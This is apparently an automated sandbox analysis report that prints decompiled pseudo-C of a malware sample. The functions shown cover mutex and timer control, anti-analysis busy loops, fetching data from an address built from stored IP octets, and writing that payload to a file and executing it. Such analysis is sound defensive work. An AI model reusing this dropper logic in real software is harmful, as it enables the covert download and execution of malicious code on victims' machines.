					 *0xe8c200( &_v268, 0x40, _t69,  *0xe8c27c);
					HeapFree(GetProcessHeap(), 0, _t69);
					_t45 = CreateMutexW(0, 0,  &_v268);
					 *0xe8c2a0 = _t45;
					if(_t45 == 0) {
						goto L12;
					}
					_t47 = CreateEventW(0, 0, 0,  &_v396);
					 *0xe8c29c = _t47;
					if(_t47 != 0) {
						_t57 = SignalObjectAndWait(_t47,  *0xe8c2a0, 0xffffffff, 0);
						if(_t57 == 0 || _t57 == 0x80) {
							_t59 = ResetEvent( *0xe8c29c);
						}
					}
					ReleaseMutex(_t66);
					CloseHandle(_t66);
					if(_t59 != 0) {
						_t50 = GetTickCount();
						_push(0x10);
						_push(0x3e8);
						_push(0x3e8);
						_push(0);
						 *0xe8c280 = 1;
						_push(E00E88DD0);
						 *0xe8c278 = _t50 + 0x3e8;
						_push(0);
						_push( &_v12);
						if( *0xe8c0ec() != 0) {
							WaitForSingleObject( *0xe8c29c, 0xffffffff);
							 *0xe8c138(0, _v12, 0xffffffff);
						}
						CloseHandle( *0xe8c29c);
					}
				}
			}

0x00e8906e
0x00e89076
0x00e8907f
0x00e8908a
0x00e8908d
0x00e89098
0x00e890a5
0x00e890b7
0x00e890cc
0x00e890d0
0x00e8924f
0x00e89255
0x00e89261
0x00e8926d
0x00e8927b
0x00e89281
0x00e89294
0x00e89294
0x00e890d8
0x00e890e0
0x00e89100
0x00e8910b
0x00e89118
0x00e8912b
0x00e8913f
0x00e89144
0x00e8914f
0x00e8915c
0x00e8916f
0x00e89180
0x00e89186
0x00e8918d
0x00000000
0x00000000
0x00e891a0
0x00e891a6
0x00e891ad
0x00e891ba
0x00e891c2
0x00e891d7
0x00e891d7
0x00e891c2
0x00e891da
0x00e891e1
0x00e891e9
0x00e891eb
0x00e891f1
0x00e891f3
0x00e891f8
0x00e891fd
0x00e89204
0x00e8920e
0x00e89213
0x00e8921b
0x00e8921d
0x00e89226
0x00e89230
0x00e8923d
0x00e8923d
0x00e89249
0x00e89249
0x00e891e9

APIs

memset.NTDLL ref: 00E89076

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

_snwprintf.NTDLL ref: 00E890A5
GetProcessHeap.KERNEL32(00000000,00E89315), ref: 00E890B0
HeapFree.KERNEL32(00000000), ref: 00E890B7
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00E890C6
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00E890D8
_snwprintf.NTDLL ref: 00E89118
GetProcessHeap.KERNEL32(00000000,00E89315), ref: 00E89124
HeapFree.KERNEL32(00000000), ref: 00E8912B
_snwprintf.NTDLL ref: 00E8915C
GetProcessHeap.KERNEL32(00000000,00E89315), ref: 00E89168
HeapFree.KERNEL32(00000000), ref: 00E8916F
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00E89180
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 00E891A0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 00E891BA
ResetEvent.KERNEL32 ref: 00E891D1
ReleaseMutex.KERNEL32(00000000), ref: 00E891DA
CloseHandle.KERNEL32(00000000), ref: 00E891E1
GetTickCount.KERNEL32 ref: 00E891EB
CreateTimerQueueTimer.KERNEL32(?,00000000,00E88DD0,00000000,000003E8,000003E8,00000010), ref: 00E8921E
WaitForSingleObject.KERNEL32(000000FF), ref: 00E89230
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 00E8923D
CloseHandle.KERNEL32 ref: 00E89249

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
String ID:
API String ID: 3199319163-0
Opcode ID: 7d7ae1d1885473b6fcf03776c3716c1e9a07f3602f0562ec6c1182f843d55ec4
Instruction ID: b94f749945b800ff59d398cf635fe4a900d80da4a5fe98b40072c905fd6908c5
Opcode Fuzzy Hash: 7d7ae1d1885473b6fcf03776c3716c1e9a07f3602f0562ec6c1182f843d55ec4
Instruction Fuzzy Hash: EF516D71941205BFEB106BE2EC8DFAA3B78EB06715F244151BA0DF21F2DB7099488B70

Uniqueness

Uniqueness Score: -1.00%

Function 00E89620, Relevance: 31.8, APIs: 21, Instructions: 284
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00E89620(void* __ecx, void* __edx) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				long _v46;
				struct _PROCESS_INFORMATION _v52;
				WCHAR* _v56;
				intOrPtr _v60;
				void _v64;
				void* _v68;
				struct _STARTUPINFOW _v140;
				short _v660;
				int _t56;
				void* _t64;
				long _t71;
				void* _t74;
				signed int _t103;
				long _t115;
				void* _t119;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr* _t129;

				_t56 = lstrcmpiW(0xe8c9c8, 0xe8c7c0);
				if(_t56 != 0) {
					E00E818D0();
					memset( &_v660, 0, 0x208);
					memset( &_v64, 0, 0x1e);
					_v60 = 1;
					_v56 = 0xe8c9c8;
					_v52.hThread = 0xe14;
					_v52.hProcess = 0xe8c7c0;
					_t64 =  *0xe8c218( &_v64);
					if(_t64 != 0 || _v46 != _t64) {
						GetTempPathW(0x104,  &_v660);
						GetTempFileNameW( &_v660, 0, 0,  &_v660);
						_v56 = 0xe8c7c0;
						_v52.hProcess =  &_v660;
						_v46 = 0;
						_t71 =  *0xe8c218( &_v64);
						if(_t71 != 0 || _v46 != _t71) {
							goto L35;
						} else {
							_v46 = _t71;
							_v56 = 0xe8c9c8;
							_v52.hProcess = 0xe8c7c0;
							_t74 =  *0xe8c218( &_v64);
							if(_t74 != 0 || _v46 != _t74) {
								goto L35;
							} else {
								goto L8;
							}
						}
					} else {
						L8:
						E00E81970();
						if(( *0xe8c2a4 & 0x00000001) == 0) {
							memset( &_v140, 0, 0x44);
							_v140.cb = 0x44;
							_v140.dwFlags = 0x80;
							if(CreateProcessW(0xe8c7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
								CloseHandle(_v52);
								CloseHandle(_v52.hThread);
							}
							goto L35;
						} else {
							_t125 =  *0xe8c040(0, 0, 6);
							_v28 = _t125;
							if(_t125 == 0) {
								L35:
								return 1;
							} else {
								_t127 =  *0xe8c0c0(_t125, 0xe8c3b0, 0xe8c3b0, 0x12, 0x10, 2, 0, 0xe8c7c0, 0, 0, 0, 0, 0);
								_v24 = _t127;
								if(_t127 != 0) {
									_push(0);
									_push(0);
									_v12 = 0;
									_push( &_v32);
									_push( &_v20);
									_push(0);
									_push(0);
									_push(3);
									_push(0x30);
									_push(0);
									_push(_t125);
									if( *0xe8c054() == 0 && GetLastError() == 0xea) {
										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
										_v68 = _t119;
										if(_t119 != 0) {
											_push(0);
											_push(0);
											_push( &_v32);
											_push( &_v20);
											_push(_v20);
											_push(_t119);
											_push(3);
											_push(0x30);
											_push(0);
											_push(_t125);
											if( *0xe8c054() == 0) {
												_t120 = _v16;
											} else {
												_t103 =  *0xe8c3ac; // 0x0
												_t123 = _v32 * 0x2c + _t119;
												_v16 = _t123;
												_t120 = _v16;
												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
												while(_t129 < _t123) {
													_t126 =  *0xe8c088(_t125,  *_t129, 1);
													if(_t126 != 0) {
														_push( &_v8);
														_push(0);
														_push(0);
														_push(1);
														_push(_t126);
														if( *0xe8c0b0() == 0 && GetLastError() == 0x7a) {
															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
															if(_t120 != 0) {
																_t115 =  *0xe8c0b0(_t126, 1, _t120, _v8,  &_v8);
																_v12 = _t115;
																if(_t115 == 0) {
																	HeapFree(GetProcessHeap(), _t115, _t120);
																}
															}
														}
														 *0xe8c0a8(_t126);
													}
													_t125 = _v28;
													_t129 = _t129 + 0x2c;
													_t123 = _v16;
													if(_v12 == 0) {
														continue;
													}
													break;
												}
												_t127 = _v24;
											}
											HeapFree(GetProcessHeap(), 0, _v68);
											if(_v12 != 0) {
												 *0xe8c090(_t127, 1, _t120);
												HeapFree(GetProcessHeap(), 0, _t120);
											}
										}
									}
								} else {
									_t127 =  *0xe8c088(_t125, 0xe8c3b0, 0x10);
								}
								if(_t127 != 0) {
									 *0xe8c048(_t127, 0, 0);
									 *0xe8c0a8(_t127);
								}
								 *0xe8c0a8(_t125);
								return 1;
							}
						}
					}
				} else {
					return _t56;
				}
			}

0x00e89636
0x00e8963e
0x00e89647
0x00e8965a
0x00e8966b
0x00e89674
0x00e89680
0x00e89687
0x00e8968e
0x00e89696
0x00e8969e
0x00e896b5
0x00e896c7
0x00e896d3
0x00e896da
0x00e896e1
0x00e896e8
0x00e896f0
0x00000000
0x00e896ff
0x00e896ff
0x00e89706
0x00e8970d
0x00e89714
0x00e8971c
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8971c
0x00e8972b
0x00e8972b
0x00e8972b
0x00e89737
0x00e89940
0x00e89949
0x00e89956
0x00e89980
0x00e89985
0x00e8998e
0x00e8998e
0x00000000
0x00e8973d
0x00e89749
0x00e8974b
0x00e89750
0x00e89996
0x00e8999f
0x00e89756
0x00e8977e
0x00e89780
0x00e89785
0x00e8979c
0x00e8979e
0x00e897a3
0x00e897aa
0x00e897ae
0x00e897af
0x00e897b1
0x00e897b3
0x00e897b5
0x00e897b7
0x00e897b9
0x00e897c2
0x00e897eb
0x00e897ed
0x00e897f2
0x00e897f8
0x00e897fa
0x00e897ff
0x00e89803
0x00e89804
0x00e89807
0x00e89808
0x00e8980a
0x00e8980c
0x00e8980e
0x00e89817
0x00e89930
0x00e8981d
0x00e8981d
0x00e8982e
0x00e89832
0x00e89835
0x00e8983a
0x00e89840
0x00e89853
0x00e89857
0x00e8985c
0x00e8985d
0x00e8985f
0x00e89861
0x00e89863
0x00e8986c
0x00e8988b
0x00e8988f
0x00e8989c
0x00e898a2
0x00e898a7
0x00e898b2
0x00e898b2
0x00e898a7
0x00e8988f
0x00e898b9
0x00e898b9
0x00e898bf
0x00e898c2
0x00e898c9
0x00e898cc
0x00000000
0x00000000
0x00000000
0x00e898cc
0x00e898d2
0x00e898d2
0x00e898e1
0x00e898eb
0x00e898f1
0x00e89901
0x00e89901
0x00e898eb
0x00e897f2
0x00e89787
0x00e89795
0x00e89795
0x00e89909
0x00e89910
0x00e89917
0x00e89917
0x00e8991e
0x00e8992f
0x00e8992f
0x00e89750
0x00e89737
0x00e89646
0x00e89646
0x00e89646

APIs

lstrcmpiW.KERNEL32(00E8C9C8,00E8C7C0), ref: 00E89636
memset.NTDLL ref: 00E8965A
memset.NTDLL ref: 00E8966B
GetTempPathW.KERNEL32(00000104,?), ref: 00E896B5
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00E896C7

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Tempmemset$FileNamePathlstrcmpi
String ID:
API String ID: 2872760765-0
Opcode ID: ad39e8e6dcb9d5cb83535744edc3411f36f61b9275ccc20aa17f913a8d7d4bf8
Instruction ID: a4a38ceda618860d927fadea34e046963d5d535fe89ab624c7c6f7d1d1b60c45
Opcode Fuzzy Hash: ad39e8e6dcb9d5cb83535744edc3411f36f61b9275ccc20aa17f913a8d7d4bf8
Instruction Fuzzy Hash: 58A1AF71E40309BFEB20AFA1EC8DFAE7778AB4AB04F241019F60CF6191D77459488B64

Uniqueness

Uniqueness Score: -1.00%

Function 00E89A90, Relevance: 25.6, APIs: 17, Instructions: 139
memoryfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00E89A90(void* __ecx, long __edx) {
				long _v8;
				void* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v100;
				char _v228;
				short _v748;
				signed int _t28;
				int _t46;
				void* _t52;
				void* _t59;
				void* _t60;
				short _t61;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_v8 = __edx;
				_t52 = __ecx;
				memset( &_v100, 0, 0x44);
				memset( &_v28, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 0x80;
				_t61 = 0;
				do {
					if(_t61 < 0xfa00) {
						GetLastError();
					}
					_t61 = _t61 + 1;
				} while (_t61 < 0x8000000);
				_t28 = GetTickCount();
				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
				E00E82240( &_v228, _t7);
				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
				E00E81830(0xe81370, 0xc, 0x7d1cc189,  &_v12);
				_t64 = _v12;
				 *0xe8c200( &_v748, 0x104, _t64, 0xe8c5b8,  &_v228);
				HeapFree(GetProcessHeap(), 0, _t64);
				_t65 = 0;
				do {
					if(_t65 < 0xfa00) {
						GetLastError();
					}
					_t65 = _t65 + 1;
				} while (_t65 < 0x8000000);
				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
				_t66 = 0;
				do {
					if(_t66 < 0xfa00) {
						GetLastError();
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x8000000);
				if(_t59 != 0xffffffff) {
					WriteFile(_t59, _t52, _v8,  &_v8, 0);
					CloseHandle(_t59);
				}
				_t60 = 0;
				do {
					_t67 = 0;
					do {
						if(_t67 < 0xfa00) {
							GetLastError();
						}
						_t67 = _t67 + 1;
					} while (_t67 < 0x8000000);
					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
					if(_t46 != 0) {
						CloseHandle(_v28);
						return CloseHandle(_v28.hThread);
					} else {
						goto L20;
					}
					L23:
					L20:
					_t60 = _t60 + 1;
					Sleep(0xc8);
				} while (_t60 < 0x10);
				return _t46;
				goto L23;
			}

0x00e89aa1
0x00e89aa7
0x00e89aa9
0x00e89ab7
0x00e89ac0
0x00e89ac7
0x00e89ace
0x00e89ad0
0x00e89ad6
0x00e89ad8
0x00e89ad8
0x00e89ade
0x00e89adf
0x00e89ae7
0x00e89af8
0x00e89afb
0x00e89b07
0x00e89b1d
0x00e89b22
0x00e89b3e
0x00e89b51
0x00e89b57
0x00e89b60
0x00e89b66
0x00e89b68
0x00e89b68
0x00e89b6e
0x00e89b6f
0x00e89b96
0x00e89b98
0x00e89ba0
0x00e89ba6
0x00e89ba8
0x00e89ba8
0x00e89bae
0x00e89baf
0x00e89bba
0x00e89bc7
0x00e89bce
0x00e89bce
0x00e89bd4
0x00e89bd6
0x00e89bd6
0x00e89bd8
0x00e89bde
0x00e89be0
0x00e89be0
0x00e89be6
0x00e89be7
0x00e89c0c
0x00e89c14
0x00e89c31
0x00e89c46
0x00000000
0x00000000
0x00000000
0x00000000
0x00e89c16
0x00e89c1b
0x00e89c1c
0x00e89c22
0x00e89c2d
0x00000000

APIs

memset.NTDLL ref: 00E89AA9
memset.NTDLL ref: 00E89AB7
GetLastError.KERNEL32 ref: 00E89AD8
GetTickCount.KERNEL32 ref: 00E89AE7
_snwprintf.NTDLL ref: 00E89B3E
GetProcessHeap.KERNEL32(00000000,?), ref: 00E89B4A
HeapFree.KERNEL32(00000000), ref: 00E89B51
GetLastError.KERNEL32 ref: 00E89B68
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00E89B90
GetLastError.KERNEL32 ref: 00E89BA8
WriteFile.KERNEL32(00000000,?,00E88F6C,00E88F6C,00000000), ref: 00E89BC7
CloseHandle.KERNEL32(00000000), ref: 00E89BCE
GetLastError.KERNEL32 ref: 00E89BE0
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E89C0C
Sleep.KERNEL32(000000C8), ref: 00E89C1C

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
String ID:
API String ID: 2430354324-0
Opcode ID: 2ac4a78d17708bd5e6e25340a4f34ef1f22cd3d1e72ae667977d239a2704570b
Instruction ID: 3ff6ef1de62e6e95d9c6f6a44bade714c9abbb5ac465655e4289559516e7cf1f
Opcode Fuzzy Hash: 2ac4a78d17708bd5e6e25340a4f34ef1f22cd3d1e72ae667977d239a2704570b
Instruction Fuzzy Hash: A941C472D40118AFEB10ABA5EC8DFEEB779EB45301F110161FA4EF7491CB3059898BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E88520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00E88520(void* _a4, long* _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v32;
				void* _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v188;
				void* _t42;
				signed char* _t62;
				void* _t64;
				void _t79;
				long _t82;
				long* _t83;
				signed char* _t88;
				void* _t92;
				long* _t103;
				void* _t104;
				void* _t105;

				_v32 = 0x10;
				_t42 = E00E88420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
				_t103 = _a8;
				_v28 = _t42;
				_t83 =  &(_t103[1]);
				 *_t83 = 0;
				 *_t103 = 0;
				if(_t42 != 0) {
					if(E00E88700( &_v40,  &_v32) != 0) {
						if(E00E823F0( &_v40,  &_v12) != 0) {
							E00E81830(0xe8c020, 0xc, 0x58619fa4,  &_a4);
							_t88 =  *0xe8c298; // 0x0
							_t104 = _a4;
							 *0xe8c200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
							HeapFree(GetProcessHeap(), 0, _t104);
							_t62 =  *0xe8c298; // 0x0
							_push(_t88);
							_t64 = E00E81C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
							_t105 = _v12;
							if(_t64 != 0) {
								_push(_v8);
								_push(_t105);
								if(E00E81D40( &_v60) != 0) {
									if(E00E81E50( &_v60,  &_v12,  &_v8) != 0) {
										if(E00E82530( &_v12,  &_v20) != 0) {
											_t92 = _v20;
											_t79 =  *_t92;
											 *_t83 = _t79;
											if(_t79 < 0x4000000) {
												_t82 = E00E884C0(_t92 + 4, _v16 - 4, _t83);
												_t92 = _v20;
												 *_t103 = _t82;
											}
											HeapFree(GetProcessHeap(), 0, _t92);
										}
										HeapFree(GetProcessHeap(), 0, _v12);
									}
									 *0xe8c234(_v52);
								}
								 *0xe8c234(_v56);
								 *0xe8c234(_v60);
							}
							HeapFree(GetProcessHeap(), 0, 0);
							HeapFree(GetProcessHeap(), 0, _t105);
						}
						HeapFree(GetProcessHeap(), 0, _v40);
					}
					HeapFree(GetProcessHeap(), 0, _v28);
				}
				return 0 |  *_t103 != 0x00000000;
			}

0x00e88538
0x00e8853f
0x00e88544
0x00e8854a
0x00e8854d
0x00e88550
0x00e88556
0x00e8855e
0x00e88571
0x00e88588
0x00e885a1
0x00e885a6
0x00e885ac
0x00e885cc
0x00e885df
0x00e885e5
0x00e885f0
0x00e885f9
0x00e885fe
0x00e88606
0x00e8860c
0x00e88612
0x00e88620
0x00e88636
0x00e88649
0x00e8864b
0x00e8864e
0x00e88650
0x00e88657
0x00e88663
0x00e88668
0x00e8866e
0x00e8866e
0x00e8867a
0x00e8867a
0x00e8868c
0x00e8868c
0x00e88695
0x00e88695
0x00e8869e
0x00e886a7
0x00e886a7
0x00e886b8
0x00e886c8
0x00e886c8
0x00e886da
0x00e886da
0x00e886ec
0x00e886ec
0x00e886ff

APIs

Part of subcall function 00E88420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00E88468
Part of subcall function 00E88420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00E8846F
Part of subcall function 00E88420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00E88493
Part of subcall function 00E88420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 00E8849A

Part of subcall function 00E88700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,00E8856F), ref: 00E88746
Part of subcall function 00E88700: RtlAllocateHeap.NTDLL(00000000), ref: 00E8874D
Part of subcall function 00E88700: memcpy.NTDLL(00000000,?,?), ref: 00E887A9

_snwprintf.NTDLL ref: 00E885CC
GetProcessHeap.KERNEL32(00000000,?), ref: 00E885D8
HeapFree.KERNEL32(00000000), ref: 00E885DF

Part of subcall function 00E81C50: memset.NTDLL ref: 00E81C70
Part of subcall function 00E81C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E81C9C
Part of subcall function 00E81C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E81CAE
Part of subcall function 00E81C50: RtlAllocateHeap.NTDLL(00000000), ref: 00E81CB5
Part of subcall function 00E81C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E81CD0
Part of subcall function 00E81C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E81CED
Part of subcall function 00E81C50: HeapFree.KERNEL32(00000000), ref: 00E81CF4

GetProcessHeap.KERNEL32(00000000,?), ref: 00E88673
HeapFree.KERNEL32(00000000), ref: 00E8867A

Part of subcall function 00E884C0: GetProcessHeap.KERNEL32(00000000,00E88668,?,?,?,00E88668,?), ref: 00E884D5
Part of subcall function 00E884C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E884DC
Part of subcall function 00E884C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E884FF
Part of subcall function 00E884C0: HeapFree.KERNEL32(00000000), ref: 00E88506

GetProcessHeap.KERNEL32(00000000,?), ref: 00E88685
HeapFree.KERNEL32(00000000), ref: 00E8868C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E886B1
HeapFree.KERNEL32(00000000), ref: 00E886B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00E886C1
HeapFree.KERNEL32(00000000), ref: 00E886C8

Part of subcall function 00E81D40: GetProcessHeap.KERNEL32(00000000,00000000,?,00E8861B), ref: 00E81DA2
Part of subcall function 00E81D40: HeapFree.KERNEL32(00000000,?,00E8861B), ref: 00E81DA9

Part of subcall function 00E81E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,00E88631), ref: 00E81E89
Part of subcall function 00E81E50: RtlAllocateHeap.NTDLL(00000000), ref: 00E81E90
Part of subcall function 00E81E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E81EFB
Part of subcall function 00E81E50: HeapFree.KERNEL32(00000000), ref: 00E81F02

GetProcessHeap.KERNEL32(00000000,?), ref: 00E886D3
HeapFree.KERNEL32(00000000), ref: 00E886DA

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

GetProcessHeap.KERNEL32(00000000,?), ref: 00E886E5
HeapFree.KERNEL32(00000000), ref: 00E886EC

Part of subcall function 00E823F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00E82422
Part of subcall function 00E823F0: RtlAllocateHeap.NTDLL(00000000), ref: 00E82429
Part of subcall function 00E823F0: memcpy.NTDLL(00E88583,?,?), ref: 00E82467
Part of subcall function 00E823F0: GetProcessHeap.KERNEL32(00000000,00E88583), ref: 00E8250A
Part of subcall function 00E823F0: HeapFree.KERNEL32(00000000), ref: 00E82511

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
String ID:
API String ID: 876682111-0
Opcode ID: 1d8af0c3972f8cc500ca234592ab23f243cf2fb470a74d2a57a4af2662d9dbb3
Instruction ID: e0b180c78bbf00bc1abfb47560aa7133d52dcd9513c580516e50cb1673dd6221
Opcode Fuzzy Hash: 1d8af0c3972f8cc500ca234592ab23f243cf2fb470a74d2a57a4af2662d9dbb3
Instruction Fuzzy Hash: DC514F71900205AFEB00ABE1ED49BDE7BB9EF09305F144450FA0DF61A1EB319A59CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00E88DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00E88DD0(void* __edx) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
				if(_t28 <  *0xe8c278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0xe8c280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M00E89044))) {
							case 0:
								 *0xe8c280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0xe8c280 = 0;
								__eax = E00E89620(__ecx, __edx);
								__eax = __eax;
								if(__eax == 0) {
									 *0xe8c280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0xe8c29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0xe8c280 = 0;
								 *0xe8c294 = 0xe81270;
								 *0xe8c298 = 0xe81270;
								__eax = E00E822E0();
								__eax =  *0xe8c02c; // 0xe812f8
								 *0xe8c26c = __eax;
								__eax =  *0xe8c030; // 0x6a
								 *0xe8c268 = 0xe8c2a8;
								 *0xe8c270 = __eax;
								 *0xe8c280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0xe8c280 = 0;
								__eax = E00E88BB0( &_v28);
								__ecx =  &_v36;
								__eax = E00E88D50( &_v36);
								__eax =  *0xe8cbd0; // 0x0
								_push(0xe8c2a8);
								_v32 = __eax;
								_v44 = 0xe8c2a8;
								_v44 =  *0xe8c1e4();
								__eax =  *0xe8c2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = E00E88920( &_v24);
									__ecx =  &_v16;
									__eax = E00E8A7A0( &_v16);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(E00E89F80( &_v84,  &_v52) != 0) {
										 &_v92 =  &_v84;
										if(E00E88520( &_v84,  &_v92) == 0) {
											__eax =  *0xe8c298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0xe8c298 = __eax;
											 *0xe8c298 = __eax;
										} else {
											__eax = E00E899A0();
											__ecx = 0;
											__eax = E00E888B0(0);
											__ecx = 0;
											__eax = E00E8A750(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(E00E8A180( &_v92,  &_v76) != 0) {
												__eax = E00E81750();
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = E00E89A90(_v76, __edx);
												}
